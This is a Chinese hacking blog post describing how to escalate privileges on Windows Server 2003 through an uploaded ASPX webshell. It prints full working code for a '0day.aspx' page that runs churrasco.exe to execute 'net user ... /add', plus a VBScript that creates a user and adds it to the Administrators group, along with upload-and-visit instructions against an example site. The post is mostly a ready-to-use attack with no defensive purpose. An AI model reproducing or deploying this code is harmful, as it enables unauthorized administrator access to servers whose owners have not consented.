昔日

Aspx下03系统0day的提权方法

豪子′Blog|关注网络安全,关注黑阔动态:

 使用 Aspx下03系统0day的提权方法的提权成功率非常高.可是需要满足一下条件
        1.webshell支持aspx
        2.能执行cmd命令
        3.系统盘有可写可读目录
        需要使用到的工具有 
        1.churrasco.exe 或者 pr.exe
        2.0day.aspx
        3.adduser.vbs
        下面是.0day.aspx的代码


  <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%><%@ import Namespace="System.IO" %><%@ import Namespace="System.Diagnostics" %><%@ import Namespace="System.Data" %><%@ import Namespace="System.Data.OleDb" %><%@ import Namespace="Microsoft.Win32" %><%@ import Namespace="System.Net.Sockets" %><%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %><%@ import Namespace="System.DirectoryServices" %><%System.Diagnostics.Process myP = new System.Diagnostics.Process();myP.StartInfo. RedirectStandardOutput = true;myP.StartInfo.FileName=Server.MapPath("churrasco.exe");myP.StartInfo.UseShellExecute = false;myP.StartInfo.Arguments= " \"net user 用户 密码 /add\" ";myP.Start();string output = myP.StandardOutput.ReadToEnd();Response.Write(output);%>


使用方法:

        1.修改0day.aspx脚本中需要添加的帐号和密码 
        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        2.上传churrasco.exe和0day.aspx到网站的程序目录
        3.然后在访问0day.x文件


 比如 目标沾站点是 www.exehack.net 0day.aspx上传到了网站根目录
        那么我们直接访问http://www.exehack.net/0day.aspx 即可添加了帐号密码。 然后没有添加即不可用。 

 


如果前面的方法提权不成功,那么有可能是管理员将net net1删除或者没有权限 那么即可用到以下方法:
        这里要用到一个vbs的脚本 脚本代码如下


  set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wsnetwork.ComputerNameSet ob=GetObject(os)Set oe=GetObject(os&"/Administrators,group")Set od=ob.Create("user","用户名")od.SetPassword "密码"od.SetInfoSet of=GetObject(os&"/用户",user)oe.add os&"/用户"

这里还是需要修改一些自己设置的用户名和密码。

然后还需要将来下ASPX oday代码里面的

        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        修改为:
        myP.StartInfo.Arguments= ” \”adduser.vbs的绝对路径\” “; 
        比如路径是C:\Inetpub\wwwroot\adduser.vbs ‘注意:这里修改把绝对路径中的\ 修改为 /
        比如 C:/Inetpub/wwwroot/adduser.vbs
        然后最后的修改结果就是
        myP.StartInfo.Arguments= ” \”C:/Inetpub/wwwroot/adduser.vbs\” “;
        全部修改完成以后 还是在浏览器访问0day.aspx文件




        
        这里需要注意的是,这种方法细节非常重要 如果大家测试没成功可以根据以上方法多尝试几次


评论

热度(1)

  1. 昔日豪子′Blog|关注网络安全,关注黑阔动态 转载了此文字